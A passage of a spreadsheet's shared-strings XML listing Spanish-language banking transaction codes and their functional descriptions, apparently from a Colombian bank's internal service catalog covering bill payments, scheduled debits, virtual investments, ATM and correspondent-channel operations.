    <t>0249-AL0:CONSULTADELDETALLEDELASFACTURASPROGRAMADAS</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente ingresa en ALM por la opción ‘Pagos/Facturas/Consultar y pagar’ donde se listarán las facturas en los diferentes estados (Inscrita, Rechazada, Preinscrita y programada).  Para esta transacción selecciona las facturas con estado ‘programada’  mostrando la siguiente información: Descripción - Nombre y código del convenio - Referencia Fija - Referencias 2/3 si aplica - Valor factura - Estado de la programación (Programado – Transmitida a ACH - Pendiente de ACH) - Banco dueño de la cuenta - Tipo y número de cuenta - Frecuencia del pago - Intentos para hacer el pago - Fecha de inicio de la programación - Fecha de fin de la programación - Fecha de próximo débito - Canal de la programación. </t>
  </si>
  <si>
    <t>0249-SV8:ConsultaDeDetalleDeLaProgramacionDeFacturas</t>
  </si>
  <si>
    <t>Esta transacción permite consultar el detalle de la factura programada por el cliente pagador la siguiente información:Descripción - Nombre y código del convenio - Referencia Fija - Referencias 2/3 si aplica - Valor factura - Estado de la programación (Programado – Transmitida a ACH - Pendiente de ACH) - Banco dueño de la cuenta - Tipo y número de cuenta - Frecuencia del pago - Intentos para hacer el pago - Fecha de inicio de la programación - Fecha de fin de la programación - Fecha de próximo débito - Canal de la programación.</t>
  </si>
  <si>
    <t>0249-SV9:TrxParaMostrarLosDetallesDeLaProgramacion</t>
  </si>
  <si>
    <t xml:space="preserve">Transacción para mostrar los detalles de la programación </t>
  </si>
  <si>
    <t>0256-AU8:CONSULTADETALLEPROGRAMACIÓN</t>
  </si>
  <si>
    <t>Después de ejecutar la transacción de pagadores inscritos 0261, el cliente recaudador puede consultar el detalle de la programación.</t>
  </si>
  <si>
    <t>0257-AU8:ConsultaArchivosEnviados</t>
  </si>
  <si>
    <t>El cliente recaudador puede consultar los archivos de respuesta que el banco le ha enviado.</t>
  </si>
  <si>
    <t>0259-AU8:CONSULTADETALLEDEARCHIVOS</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente recaudador puede consultar el detalle de los registros de los archivos que ha enviado al banco (archivos que el banco recibió). </t>
  </si>
  <si>
    <t>0261-AU8:CONSULTALISTADOPAGADORES</t>
  </si>
  <si>
    <t>El cliente recaudado puede consultar que facturas están programadas por parte de los clientes pagadores.</t>
  </si>
  <si>
    <t>0262-SV9:ANULACIONDEARCHIVOSDEFACTOCOBROS</t>
  </si>
  <si>
    <t>Como usuario de la SVE debo poder anular archivos de facturación por lotes en cualquier tipo de formato a través de la consulta de detalle de lotes.</t>
  </si>
  <si>
    <t>0265-AU8:CONSULTAESTADODEARCHIVOS</t>
  </si>
  <si>
    <t>El cliente recaudador puede ver el estado de un archivo de respuesta del banco.</t>
  </si>
  <si>
    <t>0266-AU8:ConsultaArchivosRecibidos</t>
  </si>
  <si>
    <t>El cliente recaudador puede consultar que archivos ha enviado al banco (que el banco ha recibido).</t>
  </si>
  <si>
    <t>0268-AUD:ConsultaValorRedeban</t>
  </si>
  <si>
    <t>Permite realizar la consulta en Redeban, el valor de una factura dando el código de convenio y numero de factura. Realiza verificaciones que compruebe que la cuenta pertenece al cliente, y es su cuenta autorizada para pago</t>
  </si>
  <si>
    <t>0269-AUA:EnrutadorDeConsultaAud-rbm:0268-finacle:0269</t>
  </si>
  <si>
    <t xml:space="preserve">Permite invocar una de 2 transacciones (0268 ó 0269) de acuerdo al valor ingresado en el campo WI-INDBD en la parte variable de la trama.
Si el valor en el campo es R Invoca la transacción 0268 - CONSULTA VALOR REDEBAN de servidor AUD y si el valor del campo WI-INDBD es “N”, “I” ó “E”, invoca la transacción 0269 - CONSULTA DE MAS FACTURA ASESOR del servidor AUD.
La transacción debe ser consumida bajo un modelo de autenticación ya sea por clave por HW o autenticación por token.
</t>
  </si>
  <si>
    <t>0269-AUD:ConsultaDeMasFacturaAsesor</t>
  </si>
  <si>
    <t xml:space="preserve">Permite consultar las facturas relacionadas a un cliente, mediante el consumo del servicio del servidor comunicacional modelo MQI RC2, adiciona, la transacción cuenta con un proceso de paginación para gran cantidad de data a procesar lo cual evita el constante consumo de los servicios del servidor antes mencionado.
La transacción debe ser consumida bajo un modelo de autenticación ya sea por clave por HW o autenticación por token.
</t>
  </si>
  <si>
    <t>0301-MT5:TRANSACCIONADMINISTRATIVA800ISOECOTEST</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite verificar conectividad entre los sistemas AUTHENTIC-ISERIES, donde AUTHENTICenvía la transacción administrativa 800 ECOTEST y ISERIES la procesa en el servidor MT5 transacción 301, haciendo un eco como respuesta para verificar conexión. </t>
  </si>
  <si>
    <t>0317-FS1:ConsultaSaldosConsolidados</t>
  </si>
  <si>
    <t>Consulta de Saldos Consolidados de los fondos de inversión Fiduciaria de un Cliente</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.7_Productos-Inversiones</t>
  </si>
  <si>
    <t>0317-FS2:ConsultaSaldosConsolidados</t>
  </si>
  <si>
    <t>0317-FS3:ConsultaSaldosConsolidados</t>
  </si>
  <si>
    <t>0317-FS4:ConsultaSaldosConsolidados</t>
  </si>
  <si>
    <t>0317-FS5:ConsultaSaldosConsolidados</t>
  </si>
  <si>
    <t>Consulta de Saldos Consolidados de los fondos fiduciaria asociados a un cliente</t>
  </si>
  <si>
    <t>0317-PFD:SaldosConsolidados</t>
  </si>
  <si>
    <t>Servicio que permite realizar la consulta de los saldos consolidados de fondos de inversión.</t>
  </si>
  <si>
    <t>0322-AP5:ConsultadeTasasdeInversiónVirtual</t>
  </si>
  <si>
    <t>Presentar la tabla de las tasas con la información del rango de días habilitado para el plazo de la inversión y la tasa de interés anual que rige para la inversión del cliente.</t>
  </si>
  <si>
    <t>0325-AP5:SimulacionInversiónVirtualAPP</t>
  </si>
  <si>
    <t>Este servicio le permite al cliente de la APP poder ingresar y hacer la simulación de la apertura de una inversión virtual, en la que el cliente obtiene los posibles datos de intereses que puede recibir según la periodicidad del mismo, este servicio va desde el canal y pasa al servidor CDT donde consume la transacción 0427 y hace el cálculo de la simulación según el monto y 	el plazo que haya indicado el cliente.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5.5_Canales-Moviles</t>
  </si>
  <si>
    <t>0325-SV5:SimulacionInversionVirtualSVP</t>
  </si>
  <si>
    <t>Este servicio le permite al cliente poder ingresar y hacer la simulación de la apertura de una inversión virtual, en la que el cliente obtiene los posibles datos de intereses que puede recibir según la periodicidad del mismo, este servicio va desde el canal con la transacción 0325 y pasa al servidor CDT donde consume la transacción 0427 y hace el cálculo de la simulación según el monto y 	el plazo que haya indicado el cliente.</t>
  </si>
  <si>
    <t>0326-AP5:AperturaInversiónVirtualAPP</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente en la APP tiene la opción de mirar la posibilidad de hacer una inversión virtual, donde el determina el monto, el plazo y la periodicidad que desea para el pago de los intereses, para luego crear la inversión virtual (CDT), luego de que el cliente valide en la opción de simulación puede hacer la apertura del CDT. 
El cliente que desea invertir a través del canal APP ingresando por la opción “solicitar productos/ inversión virtual / selecciona la cuenta de donde desea invertir/ ingresa el valor a invertir/elige la periodicidad y el tiempo del CDT / verifica la inversión / acepta términos y condiciones / hace la solicitud para hacer la apertura de la inversión virtual”.
Este servicio es exclusivo para personas residentes es Colombia, monto mínimo es de 500.000 pesos y el máximo de 500.000.000 de pesos.
</t>
  </si>
  <si>
    <t>0326-SV5:AperturaInversionVirtual</t>
  </si>
  <si>
    <t>Servicio que permite realizar apertura de inversión virtual por la SVP</t>
  </si>
  <si>
    <t>0326-SV5:AperturaInversionVirtualSVP</t>
  </si>
  <si>
    <t>Esta transacción consiste en la apertura de dicha inversión, en el calculo de tasas y montos de intereses que el cliente recibirá en el plazo estipulado por el, se realiza viajando al servidor CDT y luego al producto depósitos quien a su vez va hasta Finacle para validar las tasas actuales.</t>
  </si>
  <si>
    <t>0345-APP:Consultacreditohipotecario</t>
  </si>
  <si>
    <t>Esta transaccion consume el servidor pch para conectarse al broker y luego a finacle para devolver los creditos hipotecarios del cliente</t>
  </si>
  <si>
    <t>0349-AP5:Consultadetalladacreditohipotecario</t>
  </si>
  <si>
    <t>Se consulta a finacle los creditos hipotecarios y los saldos de los creditos del cliente</t>
  </si>
  <si>
    <t>0355-CGP:ConsultarInfDetalladaCreditoDeUnCliente</t>
  </si>
  <si>
    <t>Servicio que permite consultar en detalle un crédito del cliente. Retorna los siguientes campos en la consulta: tipo de préstamo, fecha desembolso, fecha próximo pago, valor inicial, saldo cargos mora, saldo interés causa, valor capital, valor otros, pago mínimo, pago total, Nro. de préstamo.</t>
  </si>
  <si>
    <t>0400-MT5:REVERSOACREDITACIONCTASBANCOLOMBIA(1.0.0)</t>
  </si>
  <si>
    <t>Servicio que permite realizar el reverso de la acreditación a cuentas Bancolombia, La transacción 0400(Flujo: FLSOL_MT5_0400) permite realizar el reverso de Moneysend, el sistema procede a realizar la transacción, de lo contrario el sistema sigue con el flujo de error</t>
  </si>
  <si>
    <t>0401-AT8:Depositoacuenta(corriente)-Atm</t>
  </si>
  <si>
    <t>Deposito a cuenta  corriente por atm</t>
  </si>
  <si>
    <t>0410-PO3:AnulaciónCompraCuentaCorriente</t>
  </si>
  <si>
    <t>Anula la compra realizada anteriormente.</t>
  </si>
  <si>
    <t>0420-MT5:REVERSOAUTOMATICOMONEYSEND</t>
  </si>
  <si>
    <t>Transacción que realiza el reverso automatico de debito o credito de Moneysend</t>
  </si>
  <si>
    <t>0422-PS5:ComprasPSEPersonasCuentaCorriente</t>
  </si>
  <si>
    <t>Pagos en el canal PSE con Cuenta Corriente</t>
  </si>
  <si>
    <t>0425-PO3:CompraCuentaCorriente</t>
  </si>
  <si>
    <t>Compra en un POS por con una cuenta corriente</t>
  </si>
  <si>
    <t>0426-CDT:AperturaInversiónVirtual</t>
  </si>
  <si>
    <t xml:space="preserve">Transacción encargada de realizar la apertura de una inversión virtual. </t>
  </si>
  <si>
    <t>0426-PO3:CompraManualMasterDebiCorriente</t>
  </si>
  <si>
    <t>Compra no presencial por una cuenta corriente</t>
  </si>
  <si>
    <t>0427-CDT:SimulaciónInversiónVirtual</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transacción se encarga de realizar la simulación de la inversión virtual. </t>
  </si>
  <si>
    <t>0431-EVI:PagoPspYRecaudoReferenciado-CuentaCte</t>
  </si>
  <si>
    <t>Dependiendo del tipo de base de datos del convenio, el enrutador envía el pago para ser procesado en el servidor SV8(Finacle) o SVP(Legado/Redeban)</t>
  </si>
  <si>
    <t>0431-SV8:PagoPspYRecaudoReferenciado</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transacción permite al cliente pagador realizar el pago de las facturas inscritas con la cuenta corriente del banco. El cliente ingresa el valor a pagar si el tipo de convenio es sin validación a BD. En la validación de BD el valor a pagar y el vencimiento de la factura están definidos en los archivos enviados por el cliente recaudador. El cliente ingresa a la SVP por medio de la opción Pagos/Consultar y pagar donde se listaran las facturas en los diferentes estados (Inscritas en las pestañas Inscritas (inscritas y programadas). En este listado selecciona la factura a pagar. </t>
  </si>
  <si>
    <t>0431-SV9:PagoPspYRecaudoReferenciado-CuentaCte</t>
  </si>
  <si>
    <t xml:space="preserve">PAGO PSP Y RECAUDO REFERENCIADO - CUENTA CTE  </t>
  </si>
  <si>
    <t>0431-SVE:PagoPspYRecaudoReferenciado-CuentaCte</t>
  </si>
  <si>
    <t>Permite pagar facturas desde cuenta corriente para convenios con BD interna Bancolombia/Redeban</t>
  </si>
  <si>
    <t>0432-SVE:ConsultaValorDePagoPspYRecaudoReferenciado</t>
  </si>
  <si>
    <t>Permite consultar el valor de la factura con BD interna bancolombiba/Redeban</t>
  </si>
  <si>
    <t>0433-SVE:PagoConveniosSve</t>
  </si>
  <si>
    <t>Permite pagar facturas desde cuenta corriente con convenios BD Finacle</t>
  </si>
  <si>
    <t>0438-SVH:TRXCtas.deDepositoaCta.Corriente</t>
  </si>
  <si>
    <t xml:space="preserve">Transferencia entre cuentas de deposito a cuentas corriente y monitoreo de la transaccion con SAS.         </t>
  </si>
  <si>
    <t>0447-SV8:InscripciónDeFacturas</t>
  </si>
  <si>
    <t xml:space="preserve">La inscripción de la factura es el registro de la factura a pagar por parte del cliente pagador en el canal SVP. El cliente ingresa a la SVP por medio de la opción “Pagos/Inscribir” donde ingresa la información de la factura de forma manual. La información a inscribir es: el código de convenio, descripción y referencia de pago. </t>
  </si>
  <si>
    <t>0447-SV9:InscripciónDeFacturasParaSve</t>
  </si>
  <si>
    <t>Permite inscribir facturas para un convenio y referencia que tengan BD bancolombia/Redeban</t>
  </si>
  <si>
    <t>0448-AL0:ELIMINACIÓNDEFACTURASALM</t>
  </si>
  <si>
    <t>El cliente pagador debe poder eliminar una factura inscrita y/o programada a través del canal ALM ingresando por la opción “ir a transacciones /Realizar pagos /consultar y pagar donde se visualizan las facturas inscritas con los siguientes campos (ver artefacto ‘Eliminar Facturas inscritas’)</t>
  </si>
  <si>
    <t>0448-SV8:ElimincacionDeFacturasSvp</t>
  </si>
  <si>
    <t xml:space="preserve">Le permite al cliente pagador poder eliminar una factura inscrita y/o programada a través del canal SVP ingresando por la opción Pagos/consultar y pagar donde se listan las facturas, si el cliente desea las puede eliminar dando clic en el botón Eliminar. </t>
  </si>
  <si>
    <t>0448-SV9:ElimincacionDeFacturasSve</t>
  </si>
  <si>
    <t>Permite eliminar facturas inscritas y/o programadas que el cliente tengo en SVE</t>
  </si>
  <si>
    <t>0450-SV8:ModificaciónDeInscripciónDeFacturas</t>
  </si>
  <si>
    <t xml:space="preserve">La modificación de La factura permite al cliente pagador realizar la modificación de la factura previamente inscrita. El cliente ingresa a la SVP por medio de la opción Pagos/consultar y pagar donde consulta la factura y selecciona cual va a modificar. La información a modificar es: descripción y referencia de pago o contrato. </t>
  </si>
  <si>
    <t>0450-SV9:ModificaciónDeInscripciónDeFacturas</t>
  </si>
  <si>
    <t>Después de tener la factura programada se puede modificar las fechas de inicio y fin, días antes de la fecha vencimiento, número de reintentos y la cuenta a debitar.</t>
  </si>
  <si>
    <t>0455-SV8:InscripcionDeProgramaciónDeFactura</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente ingresa a la SVP por medio de la opción “Pagos/Consultar y Pagar” donde se listaran las facturas en los diferentes estados (Inscritas en las pestañas Inscritas (inscritas y programadas). El cliente puede programar los pagos de una factura inscrita en un rango de tiempo o tiempo indefinido, puede seleccionar el numero de reintentos para el pago y programar el pago hasta 5 días antes de la fecha de vencimiento. 
</t>
  </si>
  <si>
    <t>0455-SV9:InscripcionDeProgramaciónDeFactura</t>
  </si>
  <si>
    <t>Permite programar las facturas que tenga inscritas en SVE</t>
  </si>
  <si>
    <t>0456-SV8:ModificaciónDeProgramaciónDeFactura</t>
  </si>
  <si>
    <t xml:space="preserve">Permite realizar la modificación de la programación de las facturas para cambiar los parámetros establecidos y que se ejecuten los pagos de forma periódica 
</t>
  </si>
  <si>
    <t>0456-SV9:ModificacionDeProgramaciónDeFactura</t>
  </si>
  <si>
    <t xml:space="preserve">Modificación de programación de Facturas </t>
  </si>
  <si>
    <t>0461-AL0:CONSULTADEFACTURAS</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente pagador podrá consultar las facturas inscritas, preinscritas y rechazadas que haya inscrito previamente por este mismo canal u otro canal habilitado. </t>
  </si>
  <si>
    <t>0461-SV8:ConsultaDeFacturasInscritasSvp</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente puede consultar por SVP el listado de las facturas, para poder realizar los diferentes procesos de recaudos de acuerdo a las parametrizaciones de los convenios y las inscripciones del pagador. Cuando el cliente ingresa en SVP por la opción Pagos/Consultar y pagar allí se listarán las facturas en los diferentes estados (Inscrita, Rechazada, Pre-inscrita y programada). Si el cliente desea más información al darle clic sobre el icono ( i ) de la factura el sistema le mostrara toda la información correspondiente a la misma. 
</t>
  </si>
  <si>
    <t>0461-SV9:ConsultaDeFacturasInscritasSve</t>
  </si>
  <si>
    <t xml:space="preserve">Permite consultar las facturas que tenga el cliente en estado Inscritas, Programadas, Pendientes y Rechazadas por el canal SVE. </t>
  </si>
  <si>
    <t>0462-AT8:ValidaciondeCuenta(corriente)-Atm</t>
  </si>
  <si>
    <t>Validación de estado de la cuenta para deposito</t>
  </si>
  <si>
    <t>0462-SV8:ConsultaHistoricoDePagosClientePagador</t>
  </si>
  <si>
    <t xml:space="preserve">La consulta de histórico de pago permite al cliente pagador ver la lista de sus facturas pagadas de manera cronológica realizados por el cliente. 
</t>
  </si>
  <si>
    <t>0462-SV9:ConsultaHistoricoDePagosClientePagadorSve</t>
  </si>
  <si>
    <t xml:space="preserve">CONSULTA HISTORICO DE PAGOS CLIENTE PAGADOR SVE </t>
  </si>
  <si>
    <t>0463-SV8:ConsultaHistoricoDePagosProgramados</t>
  </si>
  <si>
    <t xml:space="preserve">Como pagador debo poder consultar los débitos programados exitoso/ rechazado de las facturas conn convenios con validación en base de datos interna. 
El cliente SVP deberá poder Consultar el histórico de pagos programados ingresando por la siguiente opción: Pagos/Historial de pagos/Pagos programados donde se listarán todos los pagos programados desde SVP en los últimos 3 meses.
</t>
  </si>
  <si>
    <t>0463-SV9:ConsultaHistoricoDePagosProgramadosSve</t>
  </si>
  <si>
    <t>CONSULTA HISTORICO DE PAGOS PROGRAMADOS SVE</t>
  </si>
  <si>
    <t>0469-SV8:AceptaciónDeTérminosYCondicionesProgramacion</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente pagador al momento de realizar la programación de la factura por primera vez debe aceptar los términos y condiciones para poder que sea efectiva la programación. </t>
  </si>
  <si>
    <t>0469-SV9:AceptaciónDeTérminosYCondicionesProgramacion</t>
  </si>
  <si>
    <t>Cuando el cliente desea programar una factura, debe leer y aceptar los términos y condiciones para finalizar la transacción.</t>
  </si>
  <si>
    <t>0470-AU4:ConsultadeAlertasEnviadasalCliente</t>
  </si>
  <si>
    <t>Servicio que se genera al momento en que el Cliente , realiza una transacción que posee alerta y posteriormente  hace consulta de la misma Transacción alertada.</t>
  </si>
  <si>
    <t>Servicio referente al momento en que el Cliente , realiza una transacción que posee alerta y posteriormente   hace una consulta de la misma Transacción alertada.</t>
  </si>
  <si>
    <t>0473-SV9:ACTUALIZACIONESTADOHISTORICOLOTES</t>
  </si>
  <si>
    <t>El cliente recaudador Sucursal Virtual Empresas deberá poder consultar el lote de los archivos enviando a través de SVE ingresando  por la opción de Histórico de Transacciones/ Histórico allí se visualiza el lote enviando de recaudos (Novedades, Cobro y Facturación).</t>
  </si>
  <si>
    <t>0474-SV9:ConsultarDetalleDeLotesSVE</t>
  </si>
  <si>
    <t>El cliente recaudador Sucursal Virtual Empresas deberá poder consultar el detalle del lote de los archivos enviando a través de SVE ingresando por la opción de Histórico de Transacciones/ Histórico allí se visualiza el lote enviando de recaudos (Novedades, Cobro y Facturación) y al ingresar al estado de este lote podremos ver el detalle de cada archivo.</t>
  </si>
  <si>
    <t>0492-EV2:ConsultaMasFacturasBdi</t>
  </si>
  <si>
    <t>Permite al cliente listar todas facturas que tenga asociadas a un mismo convenio y referencia.</t>
  </si>
  <si>
    <t>0492-EVI:ConsultaMasFacturasBdi</t>
  </si>
  <si>
    <t>0492 Más facturas (Finacle)/Consulta valor (Redeban o Legado): Si el cliente va a realizar el pago de facturas y el convenio es base de datos Finacle y tiene asociadas más facturas a ese convenio, la transacción se enruta al servidor SV8 para la transacción 0492. Por el contrario si el convenio es legado se enruta la transacción al servidor SVP con el código de transaccion 0432 (Consulta valor legado).</t>
  </si>
  <si>
    <t>0492-SV8:ConsultaMasFacturasBdi</t>
  </si>
  <si>
    <t xml:space="preserve">El cliente puede consultar por SVP el listado de las facturas Para los convenios que están para base de datos interna. Cuando el cliente ingresa en SVP por la opción Pagos/Consultar y pagar allí se listarán las facturas en los diferentes estados (Inscrita, Rechazada, Preinscrita y programada). Al dar clic en el botón Pagar sobre una inscripción de factura, el sistema le lista todas las facturas asociadas a dicha inscripción que tengan la misma referencia que estén disponibles para pagar, el cliente puede seleccionar las facturas que desee pagar. 
</t>
  </si>
  <si>
    <t>0492-SV9:ConsultaMasFacturasBdi</t>
  </si>
  <si>
    <t>CONSULTA MAS FACTURAS BDI</t>
  </si>
  <si>
    <t>0501-AT8:Depositoacuenta(ahorros)-atm</t>
  </si>
  <si>
    <t>Deposito a cuenta de ahorros por atm</t>
  </si>
  <si>
    <t>0510-PO3:AnulaciónCompraCuentaAhorro</t>
  </si>
  <si>
    <t>0524-AUD:NotificacionBloqueoCanalIntentosFallidos</t>
  </si>
  <si>
    <t>Realizar control y seguimiento en el canal, al momento de Generar la notificación banco de bloqueo por superar los intentos fallidos de la primera clave de los Usuarios al mismo tiempo dejar registro donde se evidencia dicha notificación e información Mínima requerida del bloqueo</t>
  </si>
  <si>
    <t>0525-PO3:CompraCuentaAhorro</t>
  </si>
  <si>
    <t>Compra en un POS por con una cuenta ahorro</t>
  </si>
  <si>
    <t>0526-PO3:CompraMasterDebitAhorro</t>
  </si>
  <si>
    <t>Compra no presencial por una cuenta ahorro</t>
  </si>
  <si>
    <t>0531-EV2:PagoPspYRecaudoReferenciado-CuentaAhorros</t>
  </si>
  <si>
    <t>Permite enrutar los pagos de facturas al sistema Recaudos legado o Recaudos finacle según la BD del convenio</t>
  </si>
  <si>
    <t>0531-EVI:PagoPspYRecaudoReferenciado-CuentaAhorros</t>
  </si>
  <si>
    <t>0531-SV8:PagoPspYRecaudoReferenciado-CuentaAho</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transacción permite al cliente pagador realizar el pago de las facturas inscritas con la cuenta de ahorro del banco. El cliente ingresa el valor a pagar si el tipo de convenio es sin validación a BD. En la validación de BD el valor a pagar y el vencimiento de la factura están definidos en los archivos enviados por el cliente recaudador. El cliente ingresa a la SVP por medio de la opción Pagos/Consultar y pagar donde se listaran las facturas en los diferentes estados (Inscritas en las pestañas Inscritas (inscritas y programadas). En este listado selecciona la factura a pagar 
</t>
  </si>
  <si>
    <t>0531-SV9:PagoPspYRecaudoReferenciado-CuentaAhorros</t>
  </si>
  <si>
    <t>Permite el pago de facturas desde cuenta de ahorros, para las facturas con BD Finacle</t>
  </si>
  <si>
    <t>0531-SVE:PagoPspYRecaudoReferenciado-CuentaAhorros</t>
  </si>
  <si>
    <t>Permite pagar facturas desde cuenta de ahorros</t>
  </si>
  <si>
    <t>0533-SVE:PagoConveniosSve</t>
  </si>
  <si>
    <t>Permite el pago de facturas desde cuenta de ahorros para convenios con BD Finacle</t>
  </si>
  <si>
    <t>0538-SVH:0538_SVH_TransCuentaDepositoHaciaUnaCuentaAhorro</t>
  </si>
  <si>
    <t xml:space="preserve">Trans. Cuenta Deposito Hacia Una Cuenta Ahorro </t>
  </si>
  <si>
    <t>0548-AT9:CambiodepinTarjetaPrepago</t>
  </si>
  <si>
    <t>Cambio de pin Tarjeta Prepago</t>
  </si>
  <si>
    <t>0558-ALM:EnvioDinero</t>
  </si>
  <si>
    <t>Envio de dinero ahorro a la mano</t>
  </si>
  <si>
    <t>0560-AT9:ConsultaDeSaldoATMTarjetaPrepago-Fd</t>
  </si>
  <si>
    <t>0562-AT8:Validacioncuentadeahorros</t>
  </si>
  <si>
    <t>Valida la cuenta para realizar una consignacion</t>
  </si>
  <si>
    <t>0609-AU4:ValidarOtp</t>
  </si>
  <si>
    <t>Se realiza la validación de la clave dinámica de los clientes que requieran hacer transacciones monetarias.</t>
  </si>
  <si>
    <t>0610-AU4:GenerarYSolicitarOdaEnIvr</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción permite la generación y envío de la clave dinámica al cliente al mecanismo que tenga inscrito en ese momento para el servicio.
Se realizan validaciones del canal para el servicio de OTP, se genera la clave y se envía.
Esta transacción debe ser consumida con el cliente debidamente autenticado ya sea por Clave por Hardware o TOKEN OAUTH, para la correcta validación de las credenciales.
</t>
  </si>
  <si>
    <t>0611-ALM:ValidarLosDatosIngresadosPorElCliente</t>
  </si>
  <si>
    <t xml:space="preserve">Validar datos cliente para vinculación ALM
Esta transacción pertenece al canal ALM y se resuelve bajo la versión del servidor STI basado en el manejo de flujos y acciones.
La transacción se encargará de validar si los datos suministrados por la persona cumplen una serie de condiciones para proceder luego con la apertura de una cuenta ALM. 
Esta transacción permite validar los datos suministrados por el cliente en el front.
Dichas validaciones se realizarán contra los datos que se encuentran en CIFIN y en el CIF, para el documento y tipo de documento suministrados. </t>
  </si>
  <si>
    <t>0617-AU4:ConsultaEstadoOtp</t>
  </si>
  <si>
    <t xml:space="preserve">Permite consultar el estado del OTP del cliente, es decir, el estado de la clave dinámica con la cual el cliente puede realizar transacciones monetarias por el canal.
El estado de la clave dinámica lo retorna el servicio de EASY. Este servicio se consume con tipo y numero de documento.
La transacción debe ser consumida bajo un modelo de autenticación ya sea por clave por HW o autenticación por token.
</t>
  </si>
  <si>
    <t>0619-ALM:ConsultarPreAprobadoCliente</t>
  </si>
  <si>
    <t>Este Servicio se encarga de ir por medio de MQi a borker para que se ejecute un procedimiento almacenado el cual consulta si el cliente credito a la mano (CAM) disponible en una base de datos oracle administrada por el área de credito.</t>
  </si>
  <si>
    <t>0640-SVC:AvanceDeTarjetaDeCredito</t>
  </si>
  <si>
    <t>La transacción 0640 del servidor SVC permite realizar un avance de tarjeta de crédito al cliente, tanto a cuentas propias como cuentas de terceros. Esta transacción se encarda de consumir un servicio que hace el movimiento crédito a la cuenta del cliente y consumir a la vez otro servicio que hace la actualización del cupo de la tarjeta de crédito en first data.</t>
  </si>
  <si>
    <t>0644-SVC:RediferidodemovimientosTDC</t>
  </si>
  <si>
    <t>Servicio que permite al usuario rediferir una compra realizada con su tarjeta de crédito a nuevas cuotas, esto si la compra cumple con las características para ser rediferida y cumpliendo a demás el numero de cuota tope para rediferir el cual es 36 cuotas.</t>
  </si>
  <si>
    <t>0713-AU5:SolicitudCancelacionDeGirosMulticanal</t>
  </si>
  <si>
    <t>Transacción STI que permite realizar la solicitud de cancelación de Giros Nacionales a través del aplicativo Atlas del proveedor Konecta por medio del canal de Telefónica.</t>
  </si>
  <si>
    <t>0714-AU5:EnvioDeAlertasDeGirosMulticanal</t>
  </si>
  <si>
    <t>Transacción STI que permite realizar la solicitud de Reenvío de Pin de Giros Nacionales a través del aplicativo Atlas del proveedor Konecta por medio del canal de Telefónica.</t>
  </si>
  <si>
    <t>0715-AU5:TransacciónConsultaInformaciónGiros</t>
  </si>
  <si>
    <t>Transacción STI que permite realizar la consulta de Giros Nacionales a través del aplicativo Atlas del proveedor Konecta por medio del canal de Telefónica.</t>
  </si>
  <si>
    <t>0750-AU4:ConsultaTopesGDE</t>
  </si>
  <si>
    <t>La transacción devuelve los topes que tiene el cliente parametrizados para cada uno de los canales; esta consulta se realiza por medio del consumo del PGM de transversales PCCRPPTX35 el cual genera un archivo en una ruta IFS en banco que después se recorre y devuelve en trama plana. Adicional la trx cuenta con paginación.</t>
  </si>
  <si>
    <t>0773-CN2:DepositoCuentadeAhorrosCB</t>
  </si>
  <si>
    <t>Transacción que permite realizar depósito en efectivo a cuenta de ahorros desde el canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5.1_Canales-Fisicos</t>
  </si>
  <si>
    <t>0774-CN2:DepósitoCuentaCorrienteCB</t>
  </si>
  <si>
    <t>Transacción que permite realizar depósito en efectivo a cuenta corriente desde un Corresponsal Bancario.</t>
  </si>
  <si>
    <t>0774–CN2:DepositoCuentaCorriente</t>
  </si>
  <si>
    <t>Transacción que permite realizar depósitos a cuentas corrientes. Esta esta está asociada al canal Corresponsales Bancarios. Esta se ejecuta a través
del switch Authentic.</t>
  </si>
  <si>
    <t>0776-CN2:RetiroCuentadeAhorrosCB</t>
  </si>
  <si>
    <t>Transacción que permite realizar retiro de una cuenta de ahorros desde un Corresponsal Bancario  utilizando Tarjeta Débito.</t>
  </si>
  <si>
    <t>0777-CN2:TransferenciadeFondosporCB</t>
  </si>
  <si>
    <t>Permite transferir fondos desde una cuenta de depósitos a otra, las cuentas pueden ser de Ahorros o Corrientes</t>
  </si>
  <si>
    <t>0782-CN2:CONSULTADESALDOSDELCANALCB</t>
  </si>
  <si>
    <t>Esta transacción permite consultar el saldo de una cuenta de Ahorro o Corriente por medio de un datafono y utilizando una tarjeta debito.</t>
  </si>
  <si>
    <t>0801-SC3:VentaDeGirosPorCb</t>
  </si>
  <si>
    <t>Transacción STI que permite realizar el envío de Giros Nacionales a través del canal Corresponsales Bancarios</t>
  </si>
  <si>
    <t>0801-SC3:VentaGirosNacionales</t>
  </si>
  <si>
    <t>Transacción STI que permite realizar el envío de Giros Nacionales desde el canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>0802-SC3:0802PagoDeGirosPorCb</t>
  </si>
  <si>
    <t>Transacción que permite reclamar Giros Nacionales a través del Canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>0803-SC3:CancelacionDeGirosPorCb</t>
  </si>
  <si>
    <t>Transacción que permite realizar la cancelación de un Giro a través del canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>0804-SC3:ReversoVenta,Pago,CancelacionDeGirosPorCb</t>
  </si>
  <si>
    <t>Transacción que permite realizar el reverso de las transacciones de Venta, Pago y Cancelación de Giros Nacionales realizadas a través del canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>0805-SC3:ConsultaDeGirosParaCancelacionPorCb</t>
  </si>
  <si>
    <t>Transacción que permite realizar la consulta de giros previa a la cancelación desde el canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>0998-DP5:Transferenciamasivaconsolidado</t>
  </si>
  <si>
